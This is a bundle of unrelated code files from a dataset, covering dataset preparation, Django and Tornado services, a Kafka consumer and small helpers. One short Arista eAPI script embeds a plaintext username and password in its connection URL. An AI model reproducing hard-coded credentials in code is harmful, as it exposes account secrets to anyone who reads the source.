tfrecords!')\n if self.writer:\n self.writer.close()\n\nif TFRECORDS_OUTPUT_DIR:\n training_tfr_writer = TFRecordsWriter(os.path.join(TFRECORDS_OUTPUT_DIR, 'train-%.5d'), IMS_PER_RECORD)\n test_tfr_writer = TFRecordsWriter(os.path.join(TFRECORDS_OUTPUT_DIR, 'test-%.5d'), IMS_PER_RECORD)\nelse:\n training_tfr_writer = None\n test_tfr_writer = None\n\n# The detection part\nimages_missing = False\nwith graph.as_default():\n with tf.Session() as sess:\n ### Preparations: get all the output tensors\n ops = tf.get_default_graph().get_operations()\n all_tensor_names = {output.name for op in ops for output in op.outputs}\n tensor_dict = {}\n for key in [\n 'num_detections', 'detection_boxes', 'detection_scores',\n 'detection_classes'\n ]:\n tensor_name = key + ':0'\n if tensor_name in all_tensor_names:\n tensor_dict[key] = tf.get_default_graph().get_tensor_by_name(\n tensor_name)\n if 'detection_masks' in tensor_dict:\n # The following processing is only for single image\n detection_boxes = tf.squeeze(tensor_dict['detection_boxes'], [0])\n # Reframe is required to translate mask from box coordinates to image coordinates and fit the image size.\n real_num_detection = tf.cast(tensor_dict['num_detections'][0], tf.int32)\n detection_boxes = tf.slice(detection_boxes, [0, 0], [real_num_detection, -1])\n image_tensor = tf.get_default_graph().get_tensor_by_name('image_tensor:0')\n\n # For all images listed in the annotations file\n next_image_id = 0\n next_annotation_id = 0\n for cur_image_id in tqdm.tqdm(list(sorted([vv['id'] for vv in coco.imgs.values()]))):\n cur_image = coco.loadImgs([cur_image_id])[0]\n cur_file_name = cur_image['file_name']\n # Path to the input image\n in_file = os.path.join(IMAGE_DIR, cur_file_name)\n # Skip the image if it is annotated with more than one category\n if len(set([ann['category_id'] for ann in coco.imgToAnns[cur_image['id']]])) != 1:\n continue\n # Get category ID for this image\n cur_cat_id = coco.imgToAnns[cur_image['id']][0]['category_id']\n # ... 
and the corresponding category name\n cur_cat_name = cat_id_to_names[cur_cat_id]\n # The remapped category ID for our json file\n cur_json_cat_id = cat_id_to_new_id[cur_cat_id]\n # Whether it belongs to a training or testing location\n is_train = cur_image[SPLIT_BY] in training_locations\n\n # Skip excluded categories\n if cur_cat_name in EXCLUDED_CATEGORIES:\n continue\n\n # If we already have detection results, we can use them\n if cur_image_id in detections.keys():\n output_dict = detections[cur_image_id]\n # Otherwise run detector\n else:\n # We allow skipping images that are not available right now\n # This is useful for processing parts of large datasets\n if not os.path.isfile(os.path.join(IMAGE_DIR, cur_file_name)):\n if not images_missing:\n print('Could not find ' + cur_file_name)\n print('Suppressing any further warnings about missing files.')\n images_missing = True\n continue\n\n # Load image\n image = np.array(Image.open(os.path.join(IMAGE_DIR, cur_file_name)))\n if image.dtype != np.uint8:\n print('Failed to load image ' + cur_file_name)\n continue\n\n # Run inference\n output_dict = sess.run(tensor_dict,\n feed_dict={image_tensor: np.expand_dims(image, 0)})\n\n # all outputs are float32 numpy arrays, so convert types as appropriate\n output_dict['num_detections'] = int(output_dict['num_detections'][0])\n output_dict['detection_classes'] = output_dict[\n 'detection_classes'][0].astype(np.uint8)\n output_dict['detection_boxes'] = output_dict['detection_boxes'][0]\n output_dict['detection_scores'] = output_dict['detection_scores'][0]\n if 'detection_masks' in output_dict:\n output_dict['detection_masks'] = output_dict['detection_masks'][0]\n\n # Add detections to the collection\n detections[cur_image_id] = output_dict\n\n imsize = cur_image['width'], cur_image['height']\n # Select detections with a confidence larger than DETECTION_THRESHOLD\n selection = output_dict['detection_scores'] > DETECTION_THRESHOLD\n # Skip if no detection selected\n if np.sum(selection) < 1 or selection.size == 0:\n continue\n # Get these boxes and convert normalized coordinates to pixel coordinates\n selected_boxes = (output_dict['detection_boxes'][selection] * np.tile([imsize[1],imsize[0]], (1,2)))\n # Pad the detected animal to a square box and additionally by PADDING_FACTOR, the result will be in crop_boxes\n # However, we need to make sure that the box coordinates are still within the image\n bbox_sizes = np.vstack([selected_boxes[:,2] - selected_boxes[:,0], selected_boxes[:,3] - selected_boxes[:,1]]).T\n offsets = (PADDING_FACTOR * np.max(bbox_sizes, axis=1, keepdims=True) - bbox_sizes) / 2\n crop_boxes = selected_boxes + np.hstack([-offsets,offsets])\n crop_boxes = np.maximum(0,crop_boxes).astype(int)\n # For each detected bounding box with high confidence, we will\n # crop the image to the padded box and save it\n for box_id in range(selected_boxes.shape[0]):\n # bbox is the detected box, crop_box the padded / enlarged box\n bbox, crop_box = selected_boxes[box_id], crop_boxes[box_id]\n if COCO_OUTPUT_DIR:\n # The file path as it will appear in the annotation json\n new_file_name = os.path.join(cur_cat_name, cur_file_name)\n # Add numbering to the original file name if there are multiple boxes\n if selected_boxes.shape[0] > 1:\n new_file_base, new_file_ext = os.path.splitext(new_file_name)\n new_file_name = '{}_{}{}'.format(new_file_base, box_id, new_file_ext)\n # The absolute file path where we will store the image\n # Only used if a coco-style dataset is created\n out_file = 
os.path.join(COCO_OUTPUT_DIR, new_file_name)\n # Create the category directories if necessary\n os.makedirs(os.path.dirname(out_file), exist_ok=True)\n if not os.path.exists(out_file):\n try:\n img = np.array(Image.open(in_file))\n cropped_img = img[crop_box[0]:crop_box[2], crop_box[1]:crop_box[3]]\n Image.fromarray(cropped_img).save(out_file)\n except ValueError:\n continue\n except FileNotFoundError:\n continue\n else:\n # if COCO_OUTPUT_DIR is set, then we will only use the shape\n # of cropped_img in the following code. So instead of reading \n # cropped_img = np.array(Image.open(out_file))\n # we can speed everything up by reading only the size of the image\n cropped_img = np.zeros((3,) + Image.open(out_file).size).T\n else:\n out_file = TMP_IMAGE\n try:\n img = np.array(Image.open(in_file))\n cropped_img = img[crop_box[0]:crop_box[2], crop_box[1]:crop_box[3]]\n Image.fromarray(cropped_img).save(out_file)\n except ValueError:\n continue\n except FileNotFoundError:\n continue\n \n \n # Read the image\n if COCO_OUTPUT_DIR:\n # Add annotations to the appropriate json\n if is_train:\n cur_json = training_json\n cur_tfr_writer = training_tfr_writer\n else:\n cur_json = test_json\n cur_tfr_writer = test_tfr_writer\n cur_json['images'].append(dict(id=next_image_id,\n width=cropped_img.shape[1],\n height=cropped_img.shape[0],\n file_name=new_file_name,\n original_key=cur_image_id))\n cur_json['annotations'].append(dict(id=next_annotation_id,\n image_id=next_image_id,\n category_id=cur_json_cat_id))\n\n if TFRECORDS_OUTPUT_DIR:\n image_data = {}\n if COCO_OUTPUT_DIR:\n image_data['filename'] = out_file\n else:\n Image.fromarray(cropped_img).save(TMP_IMAGE)\n image_data['filename'] = TMP_IMAGE\n image_data['id'] = next_image_id\n\n image_data['class'] = {}\n image_data['class']['label'] = cur_json_cat_id\n image_data['class']['text'] = cur_cat_name\n\n # Propagate optional metadata to tfrecords\n image_data['height'] = cropped_img.shape[0]\n image_data['width'] = cropped_img.shape[1]\n\n cur_tfr_writer.add(image_data)\n if not COCO_OUTPUT_DIR:\n os.remove(TMP_IMAGE)\n\n next_annotation_id = next_annotation_id + 1\n next_image_id = next_image_id + 1\n\n\nif TFRECORDS_OUTPUT_DIR:\n training_tfr_writer.close()\n test_tfr_writer.close()\n\n label_map = []\n for cat in training_json['categories']:\n label_map += ['item {{name: \"{}\" id: {}}}\\n'.format(cat['name'], cat['id'])]\n with open(os.path.join(TFRECORDS_OUTPUT_DIR, 'label_map.pbtxt'), 'w') as f:\n f.write(''.join(label_map))\n\nif COCO_OUTPUT_DIR:\n # Write out COCO-style json files to the output directory\n with open(os.path.join(COCO_OUTPUT_DIR, 'train.json'), 'wt') as fi:\n json.dump(training_json, fi)\n with open(os.path.join(COCO_OUTPUT_DIR, 'test.json'), 'wt') as fi:\n json.dump(test_json, fi)\n\n# Write detections to file with pickle\nwith open(DETECTION_OUTPUT, 'wb') as f:\n pickle.dump(detections, f, pickle.HIGHEST_PROTOCOL)\n","sub_path":"data_management/databases/classification/make_classification_dataset.py","file_name":"make_classification_dataset.py","file_ext":"py","file_size_in_byte":19953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"145495761","text":"from StackEx import *\n\n# Creates a ranking of users for each tag\n\nfilepath = 'example_data/Posts.xml'\n\npost_data = load_xml(filepath,'posts')\npost_data.Tags = post_data.Tags = to_tag_list(post_data)\npost_data['FixedNames'] = fix_names(post_data)\ntags = all_tags(post_data)\nquestiontags_dict = 
question_tags(post_data)\nuser_tag_score_dict = user_tag_scores(post_data,questiontags_dict)\ntag_sums = tag_sum(user_tag_score_dict) # got the totals\nwith open('tag_sums.txt','w') as f:\n for tag, scores in tag_sums.iteritems():\n f.write(tag+':\\n')\n c=0\n for x in scores:\n if c>10:\n break\n f.write(str(x)+'\\n')\n c+=1\n f.write('\\n')\n","sub_path":"Tag_sums.py","file_name":"Tag_sums.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"475090942","text":"# Author : R Hariharan\n\n# Contains all the parameters with respect to the biped\n\n# Right & Left leg link lengths\nRIGHT_LEG_LINK_LEN = [0,0,0,0,0]\nLEFT_LEG_LINK_LEN = [0,0,0,0,0]\n\n#Distance between the two legs\nDISTANCE_BW_LEGS = 0\nHALF_DIST_BW_LEGS = 0\n\t\ndef setRobotParameters(distanceBwLegs, rightLegLinkLen = [], leftLegLinkLen = []):\n\tglobal HALF_DIST_BW_LEGS, DISTANCE_BW_LEGS, RIGHT_LEG_LINK_LEN, LEFT_LEG_LINK_LEN\n\tDISTANCE_BW_LEGS = distanceBwLegs\n\tHALF_DIST_BW_LEGS = distanceBwLegs/2\n\tRIGHT_LEG_LINK_LEN = rightLegLinkLen\n\tLEFT_LEG_LINK_LEN = leftLegLinkLen\n\ndef checkRobotParametersSet():\n\tif DISTANCE_BW_LEGS == 0:\n\t\treturn False\n\tif all(x == 0 for x in RIGHT_LEG_LINK_LEN):\n\t\treturn False\n\tif all(x == 0 for x in LEFT_LEG_LINK_LEN):\n\t\treturn False\n\treturn True","sub_path":"Code/servo_test/scripts/hari/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"420039959","text":"from rest_framework_simplejwt.views import TokenObtainPairView\nfrom rest_framework import permissions, status\nfrom rest_framework.response import Response\nfrom .serializers import ProductSerializer, FileSerializer, \\\n TokenObtainSerializer, UserSerializer\nfrom .models import Product, Post\nfrom rest_framework.views import APIView\nfrom rest_framework.parsers import MultiPartParser, FormParser\nfrom cv2 import cvtColor, imread, COLOR_RGB2BGR\nfrom pyzbar.pyzbar import decode, ZBarSymbol\nfrom os import path, mkdir\nfrom numpy import array\nfrom PIL import Image\nfrom cairosvg import svg2png\nfrom io import BytesIO\nfrom rest_framework_simplejwt.tokens import RefreshToken\n\n\n# View that returns product data for a manually entered barcode\nclass ProductTextCode(APIView):\n permission_classes = (permissions.AllowAny,)\n\n def post(self, request, *args, **kwargs):\n product_data = Product.objects.filter(vendor_code=request.data['vendor_code'][7:12])\n if product_data.exists():\n flag = self.CheckDigitCheck(request.data['vendor_code'])\n if flag == True:\n product_date_seriali = ProductSerializer(product_data, many=True)\n return Response(product_date_seriali.data)\n elif flag == False:\n return Response(data={\"err\": \"Штрих код не подлинный\"},\n status=status.HTTP_200_OK)\n else:\n return Response(data={\"err\": \"Такого товара нету в базе\"},\n status=status.HTTP_200_OK)\n\n\n # Validates the barcode via its EAN-13 check digit\n def CheckDigitCheck(self, num):\n one_step = sum([int(i) for k, i in enumerate(num, start=1) if not k % 2])\n two_step = one_step * 3\n three_step = sum([int(i) for k, i in enumerate(num, start=1) if k % 2 and k < 13])\n four_step = two_step + three_step\n final = 10 - int(str(four_step)[-1:])\n if num[12:] == str(final):\n flag = True\n return flag\n else:\n flag = False\n return flag\n\n\n# View that returns product data from an uploaded barcode image\nclass 
ProductCode(APIView):\n parser_classes = (MultiPartParser, FormParser)\n\n def post(self, request, *args, **kwargs):\n posts_serializer = FileSerializer(data=request.data)\n if posts_serializer.is_valid():\n posts_serializer.save()\n # Here the POST response for the uploaded image is replaced\n # The response will contain the product information\n # -----------------------------------------------------------------------\n serializer = FileSerializer(Post.objects.all(), many=True)\n path_file = serializer.data[0]['cover']\n code = self.Decoder_barcode(path_file[1:])\n product = Product.objects.filter(vendor_code=code.decode('utf-8')[7:12])\n\n if product.exists():\n product_date = ProductSerializer(product, many=True)\n Post.objects.all().delete()\n return Response(product_date.data)\n else:\n Post.objects.all().delete()\n return Response(data={\"err\": \"Такого товара нету в базе\"},\n status=status.HTTP_200_OK)\n # ----------------------------------------------------------------------------\n else:\n return Response(posts_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n # Decodes the barcode in the image.\n # This method relies on the pyzbar and opencv libraries\n def Decoder_barcode(self, filename):\n\n if not path.exists('images'):\n mkdir('images/')\n\n files, file_extension = path.splitext(filename)\n # If the file is an .svg,\n # use the PIL and cairosvg libraries to convert\n # the image into a format opencv can handle\n # -----------------------------------------------------------------\n if file_extension == '.svg':\n\n with open(filename, 'r') as file:\n svg = file.read()\n\n png = svg2png(bytestring=svg)\n pil_img = Image.open(BytesIO(png))\n image = cvtColor(array(pil_img), COLOR_RGB2BGR)\n # ------------------------------------------------------------------\n else:\n image = imread(filename)\n detectBarcode = decode(image, symbols=[ZBarSymbol.EAN13])\n\n for barcode in detectBarcode:\n return barcode.data\n\n\n# View that issues a token on login\nclass ObtainToken(TokenObtainPairView):\n permission_classes = (permissions.AllowAny,)\n serializer_class = TokenObtainSerializer\n\n\n# View that creates a user\nclass CustomUserCreate(APIView):\n permission_classes = (permissions.AllowAny,)\n authentication_classes = ()\n\n def post(self, request, format='json'):\n serializer = UserSerializer(data=request.data)\n if serializer.is_valid():\n user = serializer.save()\n if user:\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n# View that returns a message after successful authorization\nclass Message(APIView):\n\n def get(self, request):\n return Response(data={\"hello\": \"Вы успешно вошли в сервис\"},\n status=status.HTTP_200_OK)\n\n\n# View that adds stale refresh tokens to the blacklist\nclass BlacklistToken(APIView):\n permission_classes = (permissions.AllowAny,)\n authentication_classes = ()\n\n def post(self, request):\n try:\n refresh_token = request.data[\"refresh_token\"]\n token = RefreshToken(refresh_token)\n token.blacklist()\n return Response(status=status.HTTP_205_RESET_CONTENT)\n except Exception as erro:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n","sub_path":"bakend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"152639277","text":"#!/usr/bin/python\n\n#Test change#\n\nfrom jsonrpclib import Server\nfrom pprint import pprint as pp\n\nswitch = Server('http://jfurtak:arista123@192.168.56.10/command-api')\noutput = switch.runCmds(1, ['show version'])\npp(output[0]['systemMacAddress'])\nresult = switch.runCmds(1, ['enable',\n 'configure',\n 'interface Management1',\n \"description MAC: %s\" % output[0]\n['systemMacAddress']])\n","sub_path":"basic_eapi.py","file_name":"basic_eapi.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"337647191","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server import util\n\n\nclass Address(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, description: str=None, type: str=None, legacy_addr_id: str=None): # noqa: E501\n \"\"\"Address - a model defined in Swagger\n\n :param description: The description of this Address. # noqa: E501\n :type description: str\n :param type: The type of this Address. # noqa: E501\n :type type: str\n :param legacy_addr_id: The legacy_addr_id of this Address. # noqa: E501\n :type legacy_addr_id: str\n \"\"\"\n self.swagger_types = {\n 'description': str,\n 'type': str,\n 'legacy_addr_id': str\n }\n\n self.attribute_map = {\n 'description': 'description',\n 'type': 'type',\n 'legacy_addr_id': 'legacy_addr_id'\n }\n self._description = description\n self._type = type\n self._legacy_addr_id = legacy_addr_id\n\n @classmethod\n def from_dict(cls, dikt) -> 'Address':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The Address of this Address. # noqa: E501\n :rtype: Address\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def description(self) -> str:\n \"\"\"Gets the description of this Address.\n\n Full description of the address with its constituent parts combined. # noqa: E501\n\n :return: The description of this Address.\n :rtype: str\n \"\"\"\n return self._description\n\n @description.setter\n def description(self, description: str):\n \"\"\"Sets the description of this Address.\n\n Full description of the address with its constituent parts combined. # noqa: E501\n\n :param description: The description of this Address.\n :type description: str\n \"\"\"\n if description is None:\n raise ValueError(\"Invalid value for `description`, must not be `None`\") # noqa: E501\n\n self._description = description\n\n @property\n def type(self) -> str:\n \"\"\"Gets the type of this Address.\n\n The type of address. # noqa: E501\n\n :return: The type of this Address.\n :rtype: str\n \"\"\"\n return self._type\n\n @type.setter\n def type(self, type: str):\n \"\"\"Sets the type of this Address.\n\n The type of address. # noqa: E501\n\n :param type: The type of this Address.\n :type type: str\n \"\"\"\n allowed_values = [\"uk\", \"foreign\", \"bfpo\", \"dx\", \"electronic\", \"unknown\"] # noqa: E501\n if type not in allowed_values:\n raise ValueError(\n \"Invalid value for `type` ({0}), must be one of {1}\"\n .format(type, allowed_values)\n )\n\n self._type = type\n\n @property\n def legacy_addr_id(self) -> str:\n \"\"\"Gets the legacy_addr_id of this Address.\n\n The legacy identifier for the address. 
# noqa: E501\n\n :return: The legacy_addr_id of this Address.\n :rtype: str\n \"\"\"\n return self._legacy_addr_id\n\n @legacy_addr_id.setter\n def legacy_addr_id(self, legacy_addr_id: str):\n \"\"\"Sets the legacy_addr_id of this Address.\n\n The legacy identifier for the address. # noqa: E501\n\n :param legacy_addr_id: The legacy_addr_id of this Address.\n :type legacy_addr_id: str\n \"\"\"\n if legacy_addr_id is None:\n raise ValueError(\"Invalid value for `legacy_addr_id`, must not be `None`\") # noqa: E501\n\n self._legacy_addr_id = legacy_addr_id\n","sub_path":"server/swagger_server/models/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":3895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"270508859","text":"from tastypie import fields\nfrom tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS\nfrom api.models import Decision, Citation, Paragraph\n\nclass DecisionResource(ModelResource):\n class Meta:\n # object_list = Decision.objects.filter(canlii_id = \"2001scc2\")\n queryset = Decision.objects.all()\n resource_name = 'decision'\n filtering = {\n 'canlii_id' : ALL\n }\n\n# http://127.0.0.1:8000/api/paragraph/citation__decision__id=1\n\nclass CitationResource(ModelResource):\n # cited_case_id = fields.ForeignKey(DecisionResource, 'cited_case_id')\n class Meta:\n # object_list = Decision.objects.filter(canlii_id = \"2001scc2\")\n queryset = Citation.objects.all()\n resource_name = 'citation'\n filtering = {\n 'cited_case_id' : ALL_WITH_RELATIONS\n }\n\n\nclass ParagraphResource(ModelResource):\n citation_id = fields.ForeignKey(CitationResource, 'citation_id')\n sentscore = fields.DecimalField(readonly=True)\n class Meta:\n # object_list = Decision.objects.filter(canlii_id = \"2001scc2\")\n # input_canlii_id = '2001scc2'\n queryset = Paragraph.objects.all()\n # queryset = Paragraph.objects.all().filter(citation_id = Citation.objects.all().filter(cited_case_id = Decision.objects.get(canlii_id = input_canlii_id)))\n resource_name = 'paragraph'\n\n filtering = {\n 'cited_paragraph' : ALL_WITH_RELATIONS\n }\n\n # def dehydrate_sentscore(self, bundle):\n # average_score = 0.0\n # for para in bundle.obj.sentiment_score.all():\n # average_score = 10000.000\n # return average_score\n\n\n # choose field names to include\n # fields = ['cited_paragraph', 'sentiment_score']\n\n\n # # http://django-tastypie.readthedocs.org/en/latest/resources.html#alter-list-data-to-serialize\n # def alter_list_data_to_serialize(self, request, data):\n # if request.GET.get('meta_only'):\n # return {'meta': data['meta']}\n # return data\n\n# # Create your models here.\n\n# class Decision(models.Model):\n# case_id_canlii = models.CharField(max_length = 100)\n# case_name = models.CharField(max_length = 500)\n# case_neutral_citation = models.CharField(max_length = 100)\n\n# def __str__(self):\n# return self.case_name\n\n# class Citation(models.Model):\n# cited_case_id = models.ForeignKey(Decision, related_name=\"cited_case\", on_delete = models.PROTECT)\n# citing_case_id = models.ForeignKey(Decision, related_name=\"citing_case\", on_delete = models.PROTECT)\n\n# def __str__(self):\n# return self.cited_case_id.case_name + \" \" + self.citing_case_id.case_name\n\n# class Paragraph(models.Model):\n# citing_case_id = models.ForeignKey(Citation, on_delete = models.PROTECT)\n# cited_paragraph = models.PositiveIntegerField()\n# citing_paragraph = models.PositiveIntegerField()\n\n# def __str__(self):\n# return 
self.cited_paragraph","sub_path":"DjangoAPIv2/api/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"242188102","text":"# installer for Met Watch\n# Copyright 2016 Chris Davies\n\nfrom setup import ExtensionInstaller\n\ndef loader():\n\treturn MetWatchInstaller()\n\nclass MetWatchInstaller(ExtensionInstaller):\n\tdef __init__(self):\n\t\tsuper(MetWatchInstaller, self).__init__(\n\t\t\tversion='0.1',\n\t\t\tname='metwatch',\n\t\t\tdescription='Uses an RSS Feed from the Met Office to provide template variables to alert to possible weather alerts',\n\t\t\tauthor='Chris Davies',\n\t\t\tauthor_email='weewx@davies-barnard.co.uk',\n\t\t\tconfig={\n\t\t\t\t'StdReport': {\n\t\t\t\t\t\t'metwatch': {\n\t\t\t\t\t\t\t\t'url' : 'http://www.metoffice.gov.uk/public/data/PWSCache/WarningsRSS/Region/sw',\n\t\t\t\t\t\t\t\t'skin': 'metwatch',\n\t\t\t\t\t\t\t\t'HTML_ROOT': 'metwatch'\n\t\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t},\n\t\t\tfiles=[\n\t\t\t\t('bin/user', ['bin/user/metwatch.py']),\n\t\t\t\t('skins/metwatch', ['skins/metwatch/skin.conf', 'skins/metwatch/index.html.tmpl']),\n\t\t\t]\n\t\t)","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"228820607","text":"from django.forms import ModelForm\nfrom newsapp import models\nfrom django import forms\nfrom django.contrib.auth.models import User\n\n#\n# class UserProfileForm(forms.Form):\n# '''Edit form for the user profile'''\n#\n# name = forms.CharField(max_length=100)\n# user = forms.ModelMultipleChoiceField(queryset=models.User.objects.all())\n\n\nclass EmailMasterForm(ModelForm):\n '''Email Master admin form'''\n\n class Meta:\n model = models.EmailMaster\n fields = '__all__'\n\nclass TGMasterForm(ModelForm):\n '''Telegram Master admin form'''\n\n class Meta:\n model = models.TelegramMaster\n fields = '__all__'\n\nclass UserForm(ModelForm):\n '''Edit form for the user'''\n\n class Meta:\n model = User\n fields = (\n \"email\",\n )\n\n\nclass UserProfileForm(ModelForm):\n '''Edit form for the user profile'''\n\n class Meta:\n model = models.UserProfile\n fields = (\n \"name\",\n )\n\n\n\n\nclass SourseAddForm(ModelForm):\n '''Form for adding a Source'''\n\n class Meta:\n model = models.Source\n fields = ('name', 'url', 'category')\n\n\nclass SourseForm(ModelForm):\n '''Form for editing a Source'''\n\n def __init__(self, *args, **kwargs):\n super(SourseForm, self).__init__(*args, **kwargs)\n # Making timezone optional\n self.fields['timezone'].required = False\n\n class Meta:\n model = models.Source\n fields = '__all__'\n\n\nclass CategoryForm(ModelForm):\n class Meta:\n model = models.Category\n fields = '__all__'\n","sub_path":"WebNews/newsapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\"\"\" A helper to create a tornado service.\n\"\"\"\n\nimport json\nimport logging\n\nimport concurrent.futures\nimport tornado.gen\nimport tornado.ioloop\nimport tornado.web\n\nfrom angus.analytics import report\nimport angus.jobs\nimport angus.streams\n\nclass FakeGatewayRoot(tornado.web.RequestHandler):\n    def initialize(self, *args, **kwargs):\n        self.service_key = kwargs.pop('service_key')\n\n    def get(self):\n        self.write({\n            \"services\": {\n                self.service_key: {\n                    \"url\": \"/services/{}\".format(self.service_key)\n                }\n            }\n        })\n\nclass FakeGatewayService(tornado.web.RequestHandler):\n    def initialize(self, *args, **kwargs):\n        self.service_key = kwargs.pop('service_key')\n        self.version = kwargs.pop('version')\n\n    def get(self):\n        self.write({\n            \"versions\": {\n                \"1\": {\"url\": \"/services/{}/{}\".format(self.service_key, self.version)}\n            }\n        })\n\nclass Description(tornado.web.RequestHandler):\n    \"\"\" Every service has a description endpoint.\n    \"\"\"\n\n    def initialize(self, *args, **kwargs):\n        self.description = kwargs.pop('description')\n        self.version = kwargs.pop('version')\n        self.service_key = kwargs.pop('service_key')\n\n    @report\n    def get(self):\n        public_url = \"%s://%s\" % (self.request.protocol, self.request.host)\n        result = {\n            \"description\": self.description,\n            \"version\": self.version,\n            \"url\": \"%s/services/%s/%s\" % (public_url,\n                                         self.service_key,\n                                         self.version),\n        }\n\n        self.write(json.dumps(result))\n\ndef wrap_computer(compute, threads):\n    if threads == 0:\n        return tornado.gen.coroutine(compute)\n\n    executor = concurrent.futures.ThreadPoolExecutor(threads)\n    @tornado.gen.coroutine\n    def wrap_compute(*args, **kwargs):\n        yield executor.submit(compute, *args, **kwargs)\n\n    return wrap_compute\n\nclass Service(tornado.web.Application):\n    \"\"\" Start a tornado server and configure it to run an angus\n    service.\n    \"\"\"\n\n    def __init__(self, service_key, version,\n                 port,\n                 compute,\n                 resource_storage=None, threads=4,\n                 description=\"No description\"):\n\n        self.logger = logging.getLogger(service_key)\n\n        self.port = port\n\n        self.queues = dict() # TODO: use celery\n\n        conf = {\n            'service_key': service_key,\n            'resource_storage': resource_storage,\n            'version': version,\n            'compute': wrap_computer(compute, threads),\n            'description': description,\n            'streams': self.queues,\n        }\n\n        basename = \"/services/{}/{}\".format(service_key, version)\n\n        super(Service, self).__init__([\n            (r\"/services\", FakeGatewayRoot, conf),\n            (r\"/services/{}\".format(service_key), FakeGatewayService, conf),\n            (r\"{}/jobs/(.*)\".format(basename), angus.jobs.Job, conf),\n            (r\"{}/jobs\".format(basename), angus.jobs.JobCollection, conf),\n            (r\"{}/streams/(.*)/input\".format(basename), angus.streams.Input, conf),\n            (r\"{}/streams/(.*)/output\".format(basename), angus.streams.Output, conf),\n            (r\"{}/streams/(.*)\".format(basename), angus.streams.Stream, conf),\n            (r\"{}/streams\".format(basename), angus.streams.Streams, conf),\n\n            (r\"{}\".format(basename), Description, conf),\n\n        ])\n\n    def start(self):\n        \"\"\" Run the service\n        \"\"\"\n        self.listen(self.port, xheaders=True)\n        tornado.ioloop.IOLoop.instance().start()\n","sub_path":"angus/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
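# A minimal usage sketch for the Service class in the angus sample above (hedged:
# the service key, port and no-op compute handler are illustrative assumptions,
# not documented angus API facts):
#
#     def compute(*args, **kwargs):
#         pass  # replace with the real job handler
#
#     service = Service("dummy", "1.0.0", port=8888, compute=compute)
#     service.start()  # binds the port and blocks on the tornado IOLoop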
+{"seq_id":"646148491","text":"class ShipmentHelper:\n\n    @staticmethod\n    def get_lowest_price(provider_pricing, package_size='S'):\n        \"\"\" Gets smallest price from price list according to package size.\n        :param provider_pricing:\n        :param package_size:\n        :return: string:\n        \"\"\"\n        prices = []\n        for key, value in provider_pricing.items():\n            for size, price in value.items():\n                if size == package_size:\n                    prices.append(price)\n        prices.sort()\n        return prices[:1][0]\n\n    @staticmethod\n    def get_price(provider, size, data):\n        \"\"\"\n        Gets price from price list according to selected provider and package size.\n        :param provider:\n        :param size:\n        :param data:\n        :return: string:\n        \"\"\"\n        return float(data[provider][size])\n\n    @staticmethod\n    def read_file(file_path):\n        \"\"\"Loops over the rows of data in the file and puts each row into a list.\n        :param file_path:\n        :return: list:\n        \"\"\"\n        with open(file_path) as f:\n            content = f.readlines()\n        content = [x.strip() for x in content]\n        return content\n\n    @staticmethod\n    def get_package_sizes(data):\n        \"\"\"Gets all available package sizes\n        :param data:\n        :return: list:\n        \"\"\"\n        sizes = []\n        for key, value in data.items():\n            for size, price in value.items():\n                if size not in sizes:\n                    sizes.append(size)\n        return sizes\n\n    @staticmethod\n    def get_providers(data):\n        \"\"\"Gets all providers. In this context we do not care if they are unique.\n        :param data:\n        :return: list:\n        \"\"\"\n        return [key for key, value in data.items()]\n\n","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"215027571","text":"import kafka_stream.kafka_consumer as c\nimport time\nfrom kafka_stream.utils import argument_parser\nfrom kafka_stream.utils import get_logger\n\n\ndef write_to_file(chunk, file_name):\n    \"\"\"Write consumed messages in a file.\"\"\"\n    with open(file_name, 'w') as file:\n        for item in chunk:\n            file.write(str(item.value))\n\n\nif __name__ == '__main__':\n\n    parser = argument_parser()\n    args = parser.parse_args()\n    logger = 